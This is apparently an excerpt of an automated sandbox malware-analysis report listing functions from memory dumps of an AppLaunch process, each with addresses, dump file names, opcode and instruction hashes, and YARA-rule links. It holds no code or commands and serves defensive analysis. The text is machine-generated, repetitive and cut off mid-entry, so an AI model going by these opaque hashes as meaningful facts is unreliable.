                                                                                                                                                                                              • Opcode ID: a919da20aef557d6f49240b9dd53d5ce2fa2c7563f398de3ae0f2a1963684d15
                                                                                                                                                                                              • Instruction ID: a8ba8873c3931509c59243c052b0f3cf332bad7a3bf2a337c708b36513d372cf
                                                                                                                                                                                              • Opcode Fuzzy Hash: a919da20aef557d6f49240b9dd53d5ce2fa2c7563f398de3ae0f2a1963684d15
                                                                                                                                                                                              • Instruction Fuzzy Hash: B9413630B063849FCB15CB79D8546EEBFF6AF85311F1480AEE541EB292CA359C45CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C45F8 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 37ff848fbc55d2de10084f2489f90a1a5afa74e03903f3fc008b1cbda05195fa
                                                                                                                                                                                              • Instruction ID: 04325406c60fe13194f3a0b3eca652864b466466ffff9e75eb32cf1060eeecb9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ff848fbc55d2de10084f2489f90a1a5afa74e03903f3fc008b1cbda05195fa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77511878A00249CFDB54DFA5D498AADBFF1BF44310F54856EE806AF2A6DB30A845CF40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C6320 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5a05842c2846944c3285b9794317c3a7b9e0d89e9d6f870abc2044b2c772ea2a
                                                                                                                                                                                              • Instruction ID: b52f421ee50a889bb2d90ed1ceb2d0f0eb045804188c19b2b8a01ba5e9e8bd2d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a05842c2846944c3285b9794317c3a7b9e0d89e9d6f870abc2044b2c772ea2a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2141F6356083818FCB12EB3CC8A459EBFF2EF46310B14849AD8959B253EB359855CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916DDD0 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3dff477c6bc8fade838343e575e17271266a75afe3b7cfbb82c562b44215ed05
                                                                                                                                                                                              • Instruction ID: 8944342ca3fb8c33ca210a25fac840cf834e0f6703f4d9a23bc3750882eedb9a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dff477c6bc8fade838343e575e17271266a75afe3b7cfbb82c562b44215ed05
                                                                                                                                                                                              • Instruction Fuzzy Hash: D151F574E00218CFDF28DFA5D944BADBBB2BF89304F2081AAD449A7355DB305995CF01
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0EA918 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b19bd7ee230b5c9543c3ea443f2e30cfbf2c837660acf26860c9f56329cbbc73
                                                                                                                                                                                              • Instruction ID: 966ef3c245d0496bf4a3784ca3a57a15bfb9a108bbf1dceebd756bd7a356eff4
                                                                                                                                                                                              • Opcode Fuzzy Hash: b19bd7ee230b5c9543c3ea443f2e30cfbf2c837660acf26860c9f56329cbbc73
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8511971B012159FCB14DFA9C684A9DFBF2AF8C310F59C069D815AB252DB39EC42CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C2310 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: eca3baa5e42908cdd5c54e4376e1245ad4aefda25756a0edaba77afec7e1cf06
                                                                                                                                                                                              • Instruction ID: 20f7878501f9e4b51c0b023f94f735f1efa8c62822dd2929aa5c5d7db21d6d3c
                                                                                                                                                                                              • Opcode Fuzzy Hash: eca3baa5e42908cdd5c54e4376e1245ad4aefda25756a0edaba77afec7e1cf06
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED415E347145058FC714DF64E98D52EBBF2FB88305B24846AE906CB2A5DF34AD06DF91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09165FC1 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 551e514057301930e4078a82217e3ee923b00ceab95b07788c9e2e043af8a74f
                                                                                                                                                                                              • Instruction ID: aee883152c7b2bb6710f68e9bcaebd683a756d1bfcbf004b423de45a04c373fe
                                                                                                                                                                                              • Opcode Fuzzy Hash: 551e514057301930e4078a82217e3ee923b00ceab95b07788c9e2e043af8a74f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C510774E11308CFDB14EFB5C9946DDBBB6BF8A305F20962AE405BB260EB345985CB41
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C4BE0 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 291d590ca98128104b26552206de887ebea71a402ac9ef2bbb969a7d05dd3848
                                                                                                                                                                                              • Instruction ID: fd3d11358c60b7f760fa016f17a0cfa80a30c15e39f05673fdbc6ffba37a6e85
                                                                                                                                                                                              • Opcode Fuzzy Hash: 291d590ca98128104b26552206de887ebea71a402ac9ef2bbb969a7d05dd3848
                                                                                                                                                                                              • Instruction Fuzzy Hash: 25511B38A10209CFDB54DFA4D498AADBBF2FF44304F54855DE506AF2A6DB74A845CF40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C8B90 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 622978bd183f34a2158607fbc9ed89b06320d159c3217cee5e282c73b04eabc2
                                                                                                                                                                                              • Instruction ID: d633eb0ee797a01be6a74d41106a5679f2221fe37407877b62ed1b9f81e664cd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 622978bd183f34a2158607fbc9ed89b06320d159c3217cee5e282c73b04eabc2
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF41BE346002058BCB24EB78D8945AE7BF2AF88350B54C97DC546AB352EF36AC05CBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C6530 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ddda7c543d927ae9bbb98e75f617e715cac39da12987c494a5861c67f7794f25
                                                                                                                                                                                              • Instruction ID: 1b752f69d70e69084d69cabef3cc8849fea2aa71e3d34ab0779b5a8156a336ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: ddda7c543d927ae9bbb98e75f617e715cac39da12987c494a5861c67f7794f25
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6418E34B042128FCB14DF69D45896EBBF2FFC4211B64806AE909CB356EB36ED11CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916C918 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fb5330815094822e18112f6d9487f4a33e5c9ba213828b85d122d8cb7668d6cd
                                                                                                                                                                                              • Instruction ID: 41ed7d0fe96f1a3081f21510a49927508ed0a32ecc990cf4a316f08bddf3f820
                                                                                                                                                                                              • Opcode Fuzzy Hash: fb5330815094822e18112f6d9487f4a33e5c9ba213828b85d122d8cb7668d6cd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A418130E00719DBCB14DFA5C85469DF7B1FF89314F14C66DE985AB264EB70A985CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C6388 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 752d3ce24634f0e8c4e351c8806e7a95475d8736faf6f12c96507bcb309947e7
                                                                                                                                                                                              • Instruction ID: c39db9656b98854555c7c9586ee8e989e880eafe0f9e1d090ecae7c01dea41cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 752d3ce24634f0e8c4e351c8806e7a95475d8736faf6f12c96507bcb309947e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6415C34B00205CFCB24DF64D848A6EBBF2FF88311B50845DE91A9B396DB36AD51CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574E6C8 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f6aa776999f9a0ab7594b7991cbacc9b3349771d90e2732dfd7ca101d1099725
                                                                                                                                                                                              • Instruction ID: a54014bcc4572417a885e0b5c10e3da5efe10f38a3eccbce62d3a5a063b2cc20
                                                                                                                                                                                              • Opcode Fuzzy Hash: f6aa776999f9a0ab7594b7991cbacc9b3349771d90e2732dfd7ca101d1099725
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1541B235B042098FCF15DBA4C4545ADBBB7FFC8321B248129D90697385EF755C119F92
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0EDD80 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7f88c296ee91cde7e23779cdbc8a0c803ce5590974f1ed896bd74b26c3b3b15e
                                                                                                                                                                                              • Instruction ID: dbfb51f6705d0a73d1e702353d44492e4ee43dabdf12e879005d20d108ae4837
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f88c296ee91cde7e23779cdbc8a0c803ce5590974f1ed896bd74b26c3b3b15e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06417E34701205CFCB50EF69D988AAE7BE2FF84310B448869E8469B362DB31FD15CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916BF00 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1f66e5cea581d11d4bab4d09e49f8a89e30b68776e86d654275867602d08136a
                                                                                                                                                                                              • Instruction ID: d5ed5c485d05150e4cf0988583ce16854039efc308dea5e3011ff763897f197f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f66e5cea581d11d4bab4d09e49f8a89e30b68776e86d654275867602d08136a
                                                                                                                                                                                              • Instruction Fuzzy Hash: B0415875E042098FCB04DFA9D958AAEBBF5BF48318F108469D406B7360D778A905CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916D098 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0f49b0b11f3aaf491b23bbe3658c9a7dcba5bf12c5f28f6efe37bb6fbab33f38
                                                                                                                                                                                              • Instruction ID: 6dda9e4f6a78b6ced2e00493d75afda0b36196180b9134dd4e06287926b9e779
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f49b0b11f3aaf491b23bbe3658c9a7dcba5bf12c5f28f6efe37bb6fbab33f38
                                                                                                                                                                                              • Instruction Fuzzy Hash: D341F878E01219DFDB24DFA5D954B9EBBB2FF49304F1080A9E809AB354DB715A85CF40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09168D4C Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 06e6ff4cec284e15eece4317d70fd7b6c36c0dc70076d92822ffe39395a06125
                                                                                                                                                                                              • Instruction ID: 18ef0ecf8e9fdfd095bdf9345a992dd1d880b5c22df924e9445b9a9ebc7ba0cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 06e6ff4cec284e15eece4317d70fd7b6c36c0dc70076d92822ffe39395a06125
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD41E4B5E00308CBDB24CF99C584ADDFBB5BF48308F648529D449BB214D7756A86CF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E3CA8 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e2c2bf32e9111b1125c93775cafb5b51225397ffdc708c47ca3f03d3e0b100ae
                                                                                                                                                                                              • Instruction ID: bc3e414b6b64203a9b05f5465a092d7aea1ae0438a59cccc0d531405e35d30ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: e2c2bf32e9111b1125c93775cafb5b51225397ffdc708c47ca3f03d3e0b100ae
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0231A02170A2C19FF75966B4A0583783EB69BD8372F84807EC507877C3CEEE08958362
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05746788 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a2115c24309f99e377990fd030c6aaf230f44eb3caf5c2940d9256ae678d1087
                                                                                                                                                                                              • Instruction ID: c8b26cbe202240ce32974bfcb5aaa8b0ae86b407ee5fc5ab06921328638c9655
                                                                                                                                                                                              • Opcode Fuzzy Hash: a2115c24309f99e377990fd030c6aaf230f44eb3caf5c2940d9256ae678d1087
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E41AD74E00218DFCB14DFA9D584A9DBBF6FF49320F14802AE809AB354DB30A945DF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C8EB0 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0e146a47bf4206f1b5eff727fcd38e36ba8f55082540431c646938553d43521c
                                                                                                                                                                                              • Instruction ID: 794dcb90ecea7e43b0ed261cdbd720d8df8994368beeed73954e69783d0c8b0e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e146a47bf4206f1b5eff727fcd38e36ba8f55082540431c646938553d43521c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 24313B34201B409FC714DF34D99882EBBF2BF89312758896DE8578B792CB79E815DB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0EB348 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0ad2545cb17741f2f18cf76f4a01e4096ad15a30f21694d3b45b9772f4fb35a8
                                                                                                                                                                                              • Instruction ID: 204a8f6d983c2e9a45dd51c4174a3f1adca253377e8706bbe074ed1df27fa505
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ad2545cb17741f2f18cf76f4a01e4096ad15a30f21694d3b45b9772f4fb35a8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3031D0797042054FCB15EB7CE86466E7AF2EBC9751B54406AE80ADB382DE31AC0187A6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574DF38 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c18ce58d635859b9da9b7ab81ab8fe172ab7dc2ef5e574fd33e74aa914672e90
                                                                                                                                                                                              • Instruction ID: 4da83074cc74ec61e16a1135c83ffa90010dde6e84d0b68b475791359f70336e
                                                                                                                                                                                              • Opcode Fuzzy Hash: c18ce58d635859b9da9b7ab81ab8fe172ab7dc2ef5e574fd33e74aa914672e90
                                                                                                                                                                                              • Instruction Fuzzy Hash: B0311A347012088FD724DF68D498AAA7BF6FB89711F244069E9079B3A1CF369C41DF52
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09168D58 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 849aad5266a0cc8aefd163809d4bdf2c90c6da4d360878eead61f6d0ad93810f
                                                                                                                                                                                              • Instruction ID: cd81dd1a640ac0e4b78049819789177efcb136c5bd4098f802f97df3ab83b5d6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 849aad5266a0cc8aefd163809d4bdf2c90c6da4d360878eead61f6d0ad93810f
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41E3B1E00208CBDB24CF99CA84ACDFBB5BF48308F648129D449BB214D7756A85CF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C8568 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fbae0e728308f5cec7835b3121a261a7d19e596fc2b44770e8a7e9dc873888bc
                                                                                                                                                                                              • Instruction ID: 9d73fa68c1ece2482677d4e219bbdda4e6a2dc3d1e2e19ca14e0dbf124fde2d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbae0e728308f5cec7835b3121a261a7d19e596fc2b44770e8a7e9dc873888bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 07315039200A459FC724EF78D98486ABBA3FFC0310314CE1DD5464B65ADF72B90987D4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0EFBE8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
